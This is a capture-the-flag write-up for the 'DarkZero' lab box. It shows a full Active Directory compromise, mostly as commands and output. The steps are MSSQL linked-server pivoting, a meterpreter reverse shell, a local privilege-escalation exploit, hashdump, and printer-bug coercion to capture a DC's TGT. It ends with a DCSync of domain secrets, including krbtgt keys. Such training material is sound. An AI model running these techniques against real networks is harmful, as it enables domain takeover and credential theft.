DarkZero
As is common in real life pentests, you will start the DarkZero box with credentials for the following account john.w / RFulUtONCOL!
User
Use of MSSQL Linked Servers to gain user access to DC02.darkzero.ext from DC01.darkzero.htb
impacket-mssqlclient john.w@DC01.darkzero.htb -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (darkzero\john.w guest@master)> enum_links
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
----------------- ---------------- ----------- ----------------- ------------------ ------------ -------
DC01 SQLNCLI SQL Server DC01 NULL NULL NULL
DC02.darkzero.ext SQLNCLI SQL Server DC02.darkzero.ext NULL NULL NULL
useLinked Server Local Login Is Self Mapping Remote Login
----------------- --------------- --------------- ------------
DC02.darkzero.ext darkzero\john.w 0 dc01_sql_svc
Using a meterpreter payload from revshells.com, we can get a session on metasploit.
We can proceed to enumerate all possible windows exploits using exploit suggester, and obtain a SYSTEM shell on DC02
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > run
[*] Started reverse TCP handler on 10.10.16.20:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
[*] Reflectively injecting the DLL into 6176...
[+] The exploit was successful, reading SYSTEM token from memory...
[+] Successfully stole winlogon handle: 608
[+] Successfully retrieved winlogon pid: 612
[*] Sending stage (203846 bytes) to 10.10.11.89
[*] Meterpreter session 3 opened (10.10.16.20:4444 -> 10.10.11.89:60473) at 2025-10-06 05:53:58 +0800
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6963aad8ba1150192f3ca6341355eb49:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:43e27ea2be22babce4fbcff3bc409a9d:::
svc_sql:1103:aad3b435b51404eeaad3b435b51404ee:816ccb849956b531db139346751db65f:::
DC02$:1000:aad3b435b51404eeaad3b435b51404ee:663a13eb19800202721db4225eadc38e:::
darkzero$:1105:aad3b435b51404eeaad3b435b51404ee:4276fdf209008f4988fa8c33d65a2f94:::
meterpreter > help
Root
Enumerating trust relationships with poweview.py, we see the following trust attributes
╭─LDAPS─[DC01.darkzero.htb]─[darkzero-ext\Administrator]-[NS:<auto>] [CACHED]
╰─PV ❯ Get-NetTrust
objectClass : top
leaf
trustedDomain
whenCreated : 29/07/2025 15:30:19 (2 months, 6 days ago)
whenChanged : 29/09/2025 18:25:18 (6 days ago)
name : darkzero.ext
objectGUID : {dc96b90d-8181-4c7f-90df-54b9814a8c06}
securityIdentifier : S-1-5-21-1969715525-31638512-2552845157
trustDirection : INBOUND
OUTBOUND
BIDIRECTIONAL
trustPartner : darkzero.ext
trustType : WINDOWS_ACTIVE_DIRECTORY
MIT
trustAttributes : FOREST_TRANSITIVE
CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION
flatName : darkzero-ext
msDS-TrustForestTrustInfo : S-1-5-21-1969715525-31638512-2552845157
We see the ENABLE_TGT_DELEGATION flag being set. Using DC02 to monitor for incoming authentication requests, we can coerce authentication from DC01.
./r.exe monitor /interval:5 /nowrap
PS C:\Users\Public> ./r.exe monitor /interval:5 /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: TGT Monitoring
[*] Monitoring every 5 seconds for new TGTs
<snip>
[*] 10/5/2025 11:25:25 PM UTC - Found new TGT:
User : DC01$@DARKZERO.HTB
StartTime : 10/5/2025 2:06:22 PM
EndTime : 10/6/2025 12:06:20 AM
RenewTill : 10/12/2025 2:06:20 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDZT3UFtLPB4JgC3QH2e6BZFq9xYVoXdyrFoFkKLuox3JwDHDPB/3la8Z+5ZmEqHJWASBeuhMlog5zmxAwSTk8CDMyaHqH4FDRYaffJsvzZg9PG6oCh4XL/70vz7b5u/kRn9I93dPD5FH6X2yxW5FE31mQQPpIbrY7Zk4y702jwZJdbyT6SMkSa5JQTSE0CLwK6eFp6UI3nCsu+mK8KlQcy60ZVTF7OWWXdiQU2cVhOWF0LVEPQkRDDX4S6Ykx8lgIIlv7+ALJdxV+2mSaqyBxpwM6p/PjD6D6R7kVHPRczbHG/ncZi+a1bhMCDS01p4/JWot5+XypHIoccep7cd8VHY/Uz0KR+egMHMXp3mqNQ0Ka8aJvlP2wuXOK5hj5SKXotYODfwxs1YTcFeaSZ5oFE/oao7R/ZebTgNZCX+RUPOedXOfjjXIM5gXODRZi0PgbdriR7Cpt0NVoRUhlNgDvHsKOB4FPZDv5Qlo42CquJNPztDzYjzQo04lk+8J74UYmSFaPxwY0pDbV7p1CSr69D8BnrIa8oTId7ceInGae1A13vAgrbcAEDqU8FJ2Oc52Tm5bEQTvB6dqZWNMuwtKX7mEqAgiRKTEs4YuCFWJGD8QfNaKYHOhOuv4ZWFXqT72u9Xl9eiaxCoPYh4pBQ2quBL7OzGFQJ+LyRgLCtOeH323CQq49xrqge5CQKoYgiyy0UZoP8dOo03fHYv5x1WZCJk7Bgs3EoJnYoKXjK7OKgTT4slpG53j/7jV94Yv8p8ZGWnmkV9UTRf1CzpmcLkUDIzHAuQfBBJBt8hQsMEvM7uA56H8AnbcmjiW6E6Tlw68rQQGAbNzen/570JoJn7OekwkHWVijvQ1FKu0PDipnD+GB2s64tkmHh9S+Wr5khE6Kyh+gRd9ReRMD1rC4VE80PVRxDO4DzDgjPaFckl0xvVCR/ehpXc2YPh1wjNyjlU1/FG9V1XaY8mTQ5FzZxxvEYl5q2s/T3sl5opGssVvx1/32sLiCh0h/Uxgqe2HNT/sX9CdNhnd9tukWwql4H6QzzNnj6eAM8Tl1rKKCvTkoYN3tdrM/kpCbIazUN5jeVS7ZYijjlkLaL6Pz2LBWdKzIlrW1U/ORWp1rwhqhnHW6erd/Z7IhE3cFX5rjUhTlLnbYjAtZkwWzid7n6QNAoxoHMcwBQv8bAtr5en1c1C4YRe8LfJzXHLgeLth3/CccTnT3NSqWywdNbaSxnmNPoBLzk6oCZBYk0VSUr842X6DJ5viBIS3x9T7tfhtPsFXVUfcw9pxtT/mVSWvJcxFYOSRHWBrkW/EOysq1cY9brLMqgzjMWkMGaDTw7HWz1rqMjDPr7FjLFfEdRBNAVeCDPWeqGpeM9ESCPKoOmd/gjARBeMxuQTJ32O/j78J0AhYDLe2Vyv7KLRZRfPMIFZS5I2Lq98nLVIWWeao4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagKzApoAMCARKhIgQg/9QHbWsj0SaSchM/AMma5dadsamgnvAZzGeId1GnyNehDhsMREFSS1pFUk8uSFRCohIwEKADAgEBoQkwBxsFREMwMSSjBwMFAGChAAClERgPMjAyNTEwMDUyMTA2MjJaphEYDzIwMjUxMDA2MDcwNjIwWqcRGA8yMDI1MTAxMjIxMDYyMFqoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI=
[*] Ticket cache size: 9
## On another Terminal
./SpoolSample.exe DC01.darkzero.htb DC02.darkzero.extWe can then use ticketConverter for interoperatibility between .kirbi and .ccache
echo "doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDZT3UFtLPB4JgC3QH2e6BZFq9xYVoXdyrFoFkKLuox3JwDHDPB/3la8Z+5ZmEqHJWASBeuhMlog5zmxAwSTk8CDMyaHqH4FDRYaffJsvzZg9PG6oCh4XL/70vz7b5u/kRn9I93dPD5FH6X2yxW5FE31mQQPpIbrY7Zk4y702jwZJdbyT6SMkSa5JQTSE0CLwK6eFp6UI3nCsu+mK8KlQcy60ZVTF7OWWXdiQU2cVhOWF0LVEPQkRDDX4S6Ykx8lgIIlv7+ALJdxV+2mSaqyBxpwM6p/PjD6D6R7kVHPRczbHG/ncZi+a1bhMCDS01p4/JWot5+XypHIoccep7cd8VHY/Uz0KR+egMHMXp3mqNQ0Ka8aJvlP2wuXOK5hj5SKXotYODfwxs1YTcFeaSZ5oFE/oao7R/ZebTgNZCX+RUPOedXOfjjXIM5gXODRZi0PgbdriR7Cpt0NVoRUhlNgDvHsKOB4FPZDv5Qlo42CquJNPztDzYjzQo04lk+8J74UYmSFaPxwY0pDbV7p1CSr69D8BnrIa8oTId7ceInGae1A13vAgrbcAEDqU8FJ2Oc52Tm5bEQTvB6dqZWNMuwtKX7mEqAgiRKTEs4YuCFWJGD8QfNaKYHOhOuv4ZWFXqT72u9Xl9eiaxCoPYh4pBQ2quBL7OzGFQJ+LyRgLCtOeH323CQq49xrqge5CQKoYgiyy0UZoP8dOo03fHYv5x1WZCJk7Bgs3EoJnYoKXjK7OKgTT4slpG53j/7jV94Yv8p8ZGWnmkV9UTRf1CzpmcLkUDIzHAuQfBBJBt8hQsMEvM7uA56H8AnbcmjiW6E6Tlw68rQQGAbNzen/570JoJn7OekwkHWVijvQ1FKu0PDipnD+GB2s64tkmHh9S+Wr5khE6Kyh+gRd9ReRMD1rC4VE80PVRxDO4DzDgjPaFckl0xvVCR/ehpXc2YPh1wjNyjlU1/FG9V1XaY8mTQ5FzZxxvEYl5q2s/T3sl5opGssVvx1/32sLiCh0h/Uxgqe2HNT/sX9CdNhnd9tukWwql4H6QzzNnj6eAM8Tl1rKKCvTkoYN3tdrM/kpCbIazUN5jeVS7ZYijjlkLaL6Pz2LBWdKzIlrW1U/ORWp1rwhqhnHW6erd/Z7IhE3cFX5rjUhTlLnbYjAtZkwWzid7n6QNAoxoHMcwBQv8bAtr5en1c1C4YRe8LfJzXHLgeLth3/CccTnT3NSqWywdNbaSxnmNPoBLzk6oCZBYk0VSUr842X6DJ5viBIS3x9T7tfhtPsFXVUfcw9pxtT/mVSWvJcxFYOSRHWBrkW/EOysq1cY9brLMqgzjMWkMGaDTw7HWz1rqMjDPr7FjLFfEdRBNAVeCDPWeqGpeM9ESCPKoOmd/gjARBeMxuQTJ32O/j78J0AhYDLe2Vyv7KLRZRfPMIFZS5I2Lq98nLVIWWeao4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagKzApoAMCARKhIgQg/9QHbWsj0SaSchM/AMma5dadsamgnvAZzGeId1GnyNehDhsMREFSS1pFUk8uSFRCohIwEKADAgEBoQkwBxsFREMwMSSjBwMFAGChAAClERgPMjAyNTEwMDUyMTA2MjJaphEYDzIwMjUxMDA2MDcwNjIwWqcRGA8yMDI1MTAxMjIxMDYyMFqoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI=" | base64 -d > dc01.kirbi
impacket-ticketConverter dc01.kirbi dc01.ccache
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] converting kirbi to ccache...
[+] done
impacket-secretsdump 'DC01$'@DC01.darkzero.htb -k -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5917507bdf2ef2c2b0a869a1cba40726:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:64f4771e4c60b8b176c3769300f6f3f7:::
john.w:2603:aad3b435b51404eeaad3b435b51404ee:44b1b5623a1446b5831a7b3a4be3977b:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d02e3fe0986e9b5f013dad12b2350b3a:::
darkzero-ext$:2602:aad3b435b51404eeaad3b435b51404ee:95e4ba6219aced32642afa4661781d4b:::
[*] Kerberos keys grabbed
Administrator:0x14:2f8efea2896670fa78f4da08a53c1ced59018a89b762cbcf6628bd290039b9cd
Administrator:0x13:a23315d970fe9d556be03ab611730673
Administrator:aes256-cts-hmac-sha1-96:d4aa4a338e44acd57b857fc4d650407ca2f9ac3d6f79c9de59141575ab16cabd
Administrator:aes128-cts-hmac-sha1-96:b1e04b87abab7be2c600fc652ac84362
Administrator:0x17:5917507bdf2ef2c2b0a869a1cba40726
krbtgt:aes256-cts-hmac-sha1-96:6330aee12ac37e9c42bc9af3f1fec55d7755c31d70095ca1927458d216884d41
krbtgt:aes128-cts-hmac-sha1-96:0ffbe626519980a499cb85b30e0b80f3
krbtgt:0x17:64f4771e4c60b8b176c3769300f6f3f7
john.w:0x14:f6d74915f051ef9c1c085d31f02698c04a4c6804d509b7c4442e8593d6d957ea
john.w:0x13:7b145a89aed458eaea530a2bd1eb93bd
john.w:aes256-cts-hmac-sha1-96:49a6d3404e9d19859c0eea1036f6e95debbdea99efea4e2c11ee529add37717e
john.w:aes128-cts-hmac-sha1-96:87d9cbd84d85c50904eba39d588e47db
john.w:0x17:44b1b5623a1446b5831a7b3a4be3977b
DC01$:aes256-cts-hmac-sha1-96:25e1e7b4219c9b414726983f0f50bbf28daa11dd4a24eed82c451c4d763c9941
DC01$:aes128-cts-hmac-sha1-96:9996363bffe713a6777597c876d4f9db
DC01$:0x17:d02e3fe0986e9b5f013dad12b2350b3a
darkzero-ext$:aes256-cts-hmac-sha1-96:eec6ace095e0f3b33a9714c2a23b19924542ba13a3268ea6831410020e1c11f3
darkzero-ext$:aes128-cts-hmac-sha1-96:3efb8a66f0a09fbc6602e46f22e8fc1c
darkzero-ext$:0x17:95e4ba6219aced32642afa4661781d4b
[*] Cleaning up...
evil-winrm to get the flag
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/5/2025 2:06 PM 34 root.txt
-ar--- 10/5/2025 2:06 PM 34 user.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type *
ca2f5f1a32<snip>
82db32d8<snip>
Last updated